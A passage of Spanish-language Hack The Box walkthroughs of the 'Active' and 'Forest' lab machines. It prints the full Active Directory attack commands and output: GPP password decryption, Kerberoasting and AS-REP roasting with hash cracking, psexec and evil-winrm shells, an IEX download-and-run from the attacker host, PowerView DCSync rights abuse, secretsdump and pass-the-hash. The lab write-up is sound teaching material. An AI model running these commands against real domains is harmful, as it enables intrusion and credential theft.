getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1,4 KiloBytes/sec) (average 0,7 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4,4 KiloBytes/sec) (average 1,1 KiloBytes/sec)
smb: \>

Miramos que nos descagamos por smb

$ ls
active.htb  content  exploit  nmap
$ cd active.htb
$ tree
.
├── DfsrPrivate
│   ├── ConflictAndDeleted
│   ├── Deleted
│   └── Installing
├── Policies
│   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   │   ├── GPT.INI
│   │   ├── Group Policy
│   │   │   └── GPE.INI
│   │   ├── MACHINE
│   │   │   ├── Microsoft
│   │   │   │   └── Windows NT
│   │   │   │       └── SecEdit
│   │   │   │           └── GptTmpl.inf
│   │   │   ├── Preferences
│   │   │   │   └── Groups
│   │   │   │       └── Groups.xml
│   │   │   └── Registry.pol
│   │   └── USER
│   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│       ├── GPT.INI
│       ├── MACHINE
│       │   └── Microsoft
│       │       └── Windows NT
│       │           └── SecEdit
│       │               └── GptTmpl.inf
│       └── USER
└── scripts

Vemos un .xml, vamos a hecharle un vistazo

$ cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Vemos una password pero esta encryptada, en este caso GPP (Group Policy Preferences). Esto es peligroso ya que microsoft en su momento, compartio la llave AES para nosotros eso no va ser ningun problema

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

El user es *svc_tgs(se encuentra en el mismo archivo), vamos a validarlo con crackmapexec

$crackmapexec smb 10.10.10.100 -u svc_tgs -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

Y nos pone un '[+]', pero no pwned!, y como el puerto 5985 no esta abierto, no podemos conectarnos con winrm. Asi que vamos a usar estas credenciales para conectarnos por smb y ldap. Pero no encontramos nada.

Escalada de Privilegios

En este punto se me ocurrio realizar un Kerberoasting attack, ya que poseo una credencial valida (link sobre mas info sobre Kerberoasting attack -> hacktricks)

$ date --set "$(net time -S 10.10.10.100)"
vie 11 ago 2023 05:30:28 -04
$ impacket-GetUserSPNs -request active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-08-11 01:39:21.761759             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$a71d0d2836501b50f6f867592b83156d2d7e912d5ae25b300826f08dadb07a49f7eb775d47208757c2011e2524215eb3fb99fde4396008a6c248b459f804ac80367d89e3990a673b87329804de9da406044ec0c48cf33a05b491d7ca7c1ca8863365feb23fae64d3b7f7b7a8f5f1e93860a5baf5493151017e297d788bc819e69997bea68b9d95501ae25eeb7b71b6c793f93a8a9a113ac0e22ea1ea0117420a579a98773d480d197a756017c5a09661d6e0b1dea30da49c974f831cbc20a642be37c32a3f5c9a54a7183c213c743e1d463d2c2b47ebc07104492e5263bcc9b7accadc1b74963c083116cb3308a0e05752af3a47394fbf05304e1eb5f6d155cf24b86567b51bdc4321bbeb7f2e27786b265c94a1fb2e12ffd8a25d0fce365226f64e53a40deaceb307d4dfe4bfe0c0e20332a4ea956c0678fc70f723d478bd3410459b4393d8ee9651befd098ccce6031f78f835caf994538aa072fb661f95b7700e7bf9ff786625bb0162a7791bda4dc323b4eded7ac6f9db823ed7ce0209f6c769d7c3562a0834cdfbbed12251375fe38f12aebf0cb872a0be7087f3d92303e81a6ef088dc62843003cc16bf7a568971ba4fd92e3a168a527dad4c13985c11e71a6a1365859bbaa16db17bae2c57e474a82b210ec8f7f00fea53db0d8da8882eeb54f855f380c36be212513587c20fd3a5cecb224e39d46610c341ff99761531d3141d54e0e621ddcd9f12b72406a08840014dc341a1009f536d3da43b897c1a2a3b40d168c0117821f118c985f4d7e027e49f535940bc64f5a8c8e1e34aca67e99116edef3f94a9918cc7c8744abed25dc9aef0dc9b1fa47f9e45bd5f7cb4093f92095ca003958e6720c38791aeee32eb6e9fa49951ddc26e23ca8b692c658ef564f035611f1beb1447e39fbdc3e97575e73628e2dfb52d6be0d0bd7b273776c6c6af562dfa4ace86272740d843446af5f34df88d3fb24baded199714cd65118b4956cb7ddfb925e3d859ae8cfe4369a5042b046db04e07e3fe0e27988675d5a32d28e285f6b091ee126ab651229326e388a461bf18468fc6dd1aa69e927f640c028c0a937808897247533c0f2e71497ac35dcfc4382b2240d0cec14bee35e90c74e79506e43c92eb2b6ea47caa88854e4113ab7f572aa231710f184e87b383ce9aa56e3a3ef22f6d59edb37b60d0280fac4b2514db36a60d804c59c89688133accb4d3c9caf56bcfcbf8b5b979cc83f79beb47c960332665

Y vemos que el user Administrator es vulnerable a Kerberoasting attack, vamos a copiar el hash e intentarlo romper un hashcat el modo es el 13100 que le corresponde a "Kerberos 5, etype 23, TGS-REP"

$ cat ../content/hash 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$3bd21142fb87b9b15387280fda3ce9bb$a71d0d2836501b50f6f867592b83156d2d7e912d5ae25b300826f08dadb07a49f7eb775d47208757c2011e2524215eb3fb99fde4396008a6c248b459f804ac80367d89e3990a673b87329804de9da406044ec0c48cf33a05b491d7ca7c1ca8863365feb23fae64d3b7f7b7a8f5f1e93860a5baf5493151017e297d788bc819e69997bea68b9d95501ae25eeb7b71b6c793f93a8a9a113ac0e22ea1ea0117420a579a98773d480d197a756017c5a09661d6e0b1dea30da49c974f831cbc20a642be37c32a3f5c9a54a7183c213c743e1d463d2c2b47ebc07104492e5263bcc9b7accadc1b74963c083116cb3308a0e05752af3a47394fbf05304e1eb5f6d155cf24b86567b51bdc4321bbeb7f2e27786b265c94a1fb2e12ffd8a25d0fce365226f64e53a40deaceb307d4dfe4bfe0c0e20332a4ea956c0678fc70f723d478bd3410459b4393d8ee9651befd098ccce6031f78f835caf994538aa072fb661f95b7700e7bf9ff786625bb0162a7791bda4dc323b4eded7ac6f9db823ed7ce0209f6c769d7c3562a0834cdfbbed12251375fe38f12aebf0cb872a0be7087f3d92303e81a6ef088dc62843003cc16bf7a568971ba4fd92e3a168a527dad4c13985c11e71a6a1365859bbaa16db17bae2c57e474a82b210ec8f7f00fea53db0d8da8882eeb54f855f380c36be212513587c20fd3a5cecb224e39d46610c341ff99761531d3141d54e0e621ddcd9f12b72406a08840014dc341a1009f536d3da43b897c1a2a3b40d168c0117821f118c985f4d7e027e49f535940bc64f5a8c8e1e34aca67e99116edef3f94a9918cc7c8744abed25dc9aef0dc9b1fa47f9e45bd5f7cb4093f92095ca003958e6720c38791aeee32eb6e9fa49951ddc26e23ca8b692c658ef564f035611f1beb1447e39fbdc3e97575e73628e2dfb52d6be0d0bd7b273776c6c6af562dfa4ace86272740d843446af5f34df88d3fb24baded199714cd65118b4956cb7ddfb925e3d859ae8cfe4369a5042b046db04e07e3fe0e27988675d5a32d28e285f6b091ee126ab651229326e388a461bf18468fc6dd1aa69e927f640c028c0a937808897247533c0f2e71497ac35dcfc4382b2240d0cec14bee35e90c74e79506e43c92eb2b6ea47caa88854e4113ab7f572aa231710f184e87b383ce9aa56e3a3ef22f6d59edb37b60d0280fac4b2514db36a60d804c59c89688133accb4d3c9caf56bcfcbf8b5b979cc83f79beb47c960332665

$ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ....

Luego de un rato, nos topamos que la contraseña es "Ticketmaster1968". Vamos a validarlo con crackmapexec

$crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)

y vemos el (Pwn3d!), ahora podemos tirar de psexec para ganar acceso a la maquina victima

$impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file cYWeJIsc.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service STVf on 10.10.10.100.....
[*] Starting service STVf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Conclusiones

Me gusto la maquina Active de htb, primera vez que tocamos crackear gracias al codigo AES y lo dicho siempre, espero que les sirva la maquina para aprender ya saben que tienen los comentarios o me pueden contactar por disc cualquier duda

Skills

- RPC Enumeration - Getting valid domain users
- AS-RepRoast attack 
- BloodHound Enumeration
- DCSync Exploitation - Secretsdump.py

Reconocimiento

Para comenzar vamos a crear los directorios para poder resolver la maquina mas cómodamente

$ mkdir Forest-10.10.10.161
$ cd Forest-10.10.10.161
$ mkdir nmap exploit content

Vamos a realizar un escaneo con nmap, para ver que puertos están abiertos del lado de la maquina victima

$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.161 -oG allPorts

Yo lo exporto en formato grepeable por que tengo una función llamada extractPorts -> (link de la utilidad de extractPorts creada por s4vitar, instalar xclip)

$ extractPorts allPorts

[*] Extracting information...

    [*] IP Address: 10.10.10.161
    [*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,4
684,49703,49951

[*] Ports copied to clipboard

Vamos a realizar un escaneo mas exhaustivo, para ver la versión y servicios que corren para esos puertos

$ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49703,49951 10.10.10.161 -oN targeted

# Nmap 7.93 scan initiated Thu Jul 27 01:24:26 2023 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49703,49951 -oN targeted 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.18s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-27 09:31:28Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49951/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h26m55s, deviation: 4h02m31s, median: 4h06m54s
| smb2-time: 
|   date: 2023-07-27T09:32:21
|_  start_date: 2023-07-27T05:47:28
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-07-27T02:32:23-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Vemos varios puertos, vamos a empezar con el 445 utilizando la herramienta crackmapexec

$ crackmapexec smb 10.10.10.161

SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

Vamos a listar las directorios que se están compartiendo por el puerto 445/smb con la herramienta smbclient

$ smbclient -L 10.10.10.161 -N

Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available

Y vemos que no hay nada, probablemente necesitemos de credenciales para poder listar lo que se este compartiendo, vemos el servicio rpc esta habilitado. Vamos a intentar conectarnos, sin proporcionar credenciales.

$ rpcclient -U "" -N 10.10.10.161

rpcclient $>

Y nos deja, vamos a intentar listar los usuarios del dominio

rpcclient $> enumdomusers

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[aman] rid:[0x2581]

Y vemos varios usuarios, podemos intentar un ASREPRoast attack (Les comparto un link de hacktricks sobre mas info sobre el ASREPRoast attack -> ASREPRoast attack). Guardamos los usuarios en un archivo

$ cd ../content
$ cat users

Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
aman

Vamos a usar la herramienta GetNPUsers para realizar el ASREPRoast attack

$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:e9528864e0fdc3de6844f0afee7aee9b$042879f4be34eca409922c1eedfa0dc61711ea98bc60555aa21c30030cff6fddfa264c2213587ec519ce07d97ea59a18a956cea4eb85e4dd2defbf40c1697104b4ee013554171de317d05f058fab99ae67a9ade0f1f7b5490c0918ee7835a3229f60cc4e8ff311e964925b311d803fc7d03051f38587ee0181772c7995c61a2f50d5c8d620c14e2c72ec3a649ed1b5252dd224afa8c62335e1751b26482792bfb1b4ac58dafc8717a359d91882204f6f472d30e55ba4ecc4b6879a8d050059b939e2f4960647046ee38dd69ef899c55b625589e8ee47002ae9e4e82aea4cfe3380e90f5ad520
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User aman doesn't have UF_DONT_REQUIRE_PREAUTH set

Y conseguimos un hash del usuario svc-alfresco. Vamos a guardarlo en un archivo y ver si podemos romper la contraseña. Vamos a utilizar john para hacer esto.

$ cd ../content
$ cat hash

e9528864e0fdc3de6844f0afee7aee9b$042879f4be34eca409922c1eedfa0dc61711ea98bc60555aa21c30030cff6fddfa264c2213587ec519ce07d97ea59a18a956cea4eb85e4dd2defbf40c1697104b4ee013554171de317d05f058fab99ae67a9ade0f1f7b5490c0918ee7835a3229f60cc4e8ff311e964925b311d803fc7d03051f38587ee0181772c7995c61a2f50d5c8d620c14e2c72ec3a649ed1b5252dd224afa8c62335e1751b26482792bfb1b4ac58dafc8717a359d91882204f6f472d30e55ba4ecc4b6879a8d050059b939e2f4960647046ee38dd69ef899c55b625589e8ee47002ae9e4e82aea4cfe3380e90f5ad520

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Created directory: /home/dh89/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          (?)
1g 0:00:00:05 DONE (2023-07-27 02:25) 0.1788g/s 730905p/s 730905c/s 730905C/s s4553592..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Vemos que la contraseña es "s3rvice" vamos a validarlo con crackmapexec

$ crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

MB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice

Y nos pone un "[+]" por tanto la contraseña es valida, como esta abierto el servicio de administracion remota de windows - winrm/5985. Vamos a ver si nos podemos conectar.

 $ crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

Y nos pone un "(Pwn3d!)" por tanto nos podemos conectar a la maquina, vamos a usar evil-winrm para realizar esto

$ evil-winrm -u 'svc-alfresco' -p 's3rvice' -i 10.10.10.161

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Y ganamos acceso a la maquina.

Escalada de privilegios

Para esto vamos a necesitar recopilar información con la herramienta bloodhound (link para mas informacion sobre la herramienta -> Bloodhound-docs). Para esto vamos a necesitar transferir un ".exe" a la maquina para recopilar la información, esto lo vamos a realizar creando una carpeta compartida desde nuestro lado con la herramienta smbserver(link de donde pueden descargar el .exe -> Bloodhound-gihub)(Si tienen alguna duda de como instalar bloodhound o cualquier otra duda lo pueden poner en los comentarios, o contactarme por discord)

$ cd ../content
$ ls

Antes de crear la carpeta compartida, en otra terminal voy a activarme el bloodhound, para esto necesitamos habilitar el neo4j(link de neo4j con mas info -> neo4j-github)

$ neo4j start
Starting Neo4j.
Started neo4j (pid:95754). It is available at http://0.0.0.0:7474
There may be a short delay until the server is ready.

Como nos dice, el servicio corre en el localhost por el puerto 7474

Ahi vemos el neo4j, si lo instalan por primera vez. Las credencialies por defecto son neo4j/neo4j -> usuario/contraseña. Ahora vamos a iniciar el bloodhound

$ BloodHound --no-sandbox

Ingresamos las cre denciales del neo4j y le damos a login

En este punto voy a crearme la carpeta compartida, dicha anteriormente(obs: nos tenemos que encontrar en el directorio donde tenemos el Bloodhound.exe)

$ mdkir ../content/sharphound
$ cd ../content/sharphound
$ ls      
SharpHound.exe

$ impacket-smbserver smbFolder $(pwd)

obs: se suele agregar un "--smb2support" para añadir soporte a la v2 de samba. En mi caso no lo pongo ya que no es necesario. Pero si les da algun error, lo pueden añadir.

mpacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Ahora desde la maquina victima, podemos ejecutar el Bloodhound.exe sin la necesidad de transferirlo a la maquina victima. Asi que vamos hacerlo de esta manera, mas comodo.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> \\10.10.14.58\smbFolder\SharpHound.exe

|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
|INFORMATION|Initializing SharpHound at 2:14 AM on 8/1/2023
|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
|INFORMATION|Beginning LDAP search for htb.local
|INFORMATION|Producer has finished, closing LDAP channel
|INFORMATION|LDAP channel closed, waiting for consumers
|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 42 MB RAM
2023-08-01T02:15:03.8449317-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
|INFORMATION|Output channel closed, waiting for output task to complete
|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
|INFORMATION|Enumeration finished in 00:00:43.3755297
|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 117 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
|INFORMATION|SharpHound Enumeration Completed at 2:15 AM on 8/1/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/1/2023   2:15 AM          18804 20230801021502_BloodHound.zip
-a----         8/1/2023   2:15 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin

Y tenemos el .zip. Vamos a traernos el archivo a nuestra maquina y analizarlo con el Bloodhound

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230801021502_BloodHound.zip

Info: Downloading C:\Users\svc-alfresco\Documents\20230801021502_BloodHound.zip to 20230801021502_BloodHound.zip

Info: Download successful!

El propio Evil-WinRM nos facilita la transferencia del archivo(obs: Evil-WinRm nos descarga el archivo en la ruta donde iniciamos seccion con Evil-WinRm por si no encuentran el archivo.)

$ cd ../content
$ ls
20230801021502_BloodHound.zip hash users sharphound

Ahi lo tenemos, ahora vamos analizar el .zip con ayuda del bloodhound

Simplemente, le damos a Upload Data y le pasamos el archivo .zip Una vez, ya tengamos todos los archivos en el bloodhound. Lo primero que hacemos es buscar el user que tenemos su contraseña

Luego le damos click derecho y lo marcamos como User as Owned

Luego nos vamos a la seccion de Analysis y le damos click en Shortest Path to Domain Admins from owned Principals

Seleccionamos al usuario Admin del Dominio

Y podemos observar, la ruta que tenemos que seguir para ser Administador. Pueden dar click derecho y darle a help, para mas informacion sobre cada usuario/grupo/permiso,etc.

Vemos que el usuario svc-alfresco es miembro de -> Service-Accounts y a su vez, este ultimo es parte de -> Privileged IT Accounts y este grupo tiene la capability de crear un PSRemote Connection con -> FOREST.HTB.LOCAL. PS Session te permite entrar en una seccion interactiva con la maquina, y gracias a todo esto. Tenemos DS-Replication-Get-Changes y DS-Replication-Get-Changes-All privilege en el dominio -> HTB.LOCAL. Estos dos permisos nos permiten realizar un DCSync attack.(Para mas info sobre DCSync attack -> hacktricks-DCSync).

Para empezar a realizar este ataque, vamos a usar el script PowerView.ps1 (link del repositorio en github -> powerview.ps1)

$ cd ../content
$ git clone https://github.com/PowerShellMafia/PowerSploit/ -b dev
$ ls
PowerSploit-3.0.0 hash 20230801021502_BloodHound.zip users
$ cd PowerSploit-3.0.0
$ cd Recon
$ ls
PowerView.ps1 Invoke-ReverseDnsLookup.ps1 Invoke-Portscan.ps1 Get-HttpStatus.ps1
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Nos transferimos el PowerView.ps1 a la maquina victima

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.58/PowerView.ps1')

Ahora vamos añadir al usuario svc-alfresco al grupo Exchange Windows Permissions

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module C:\Users\svc-alfresco\Documents\PowerView.ps1

Definimos algunas variables y asignamos el permiso DCSync al usuario svc-alfresco

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity "DC=htb,DC=local" -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.

Ahora, utilizando la herramienta secretsdump vamos a dumpear los hashes NTLM

secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
[*] Cleaning up...

Ganamos acceso como administrador con evil-winrm

$ evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

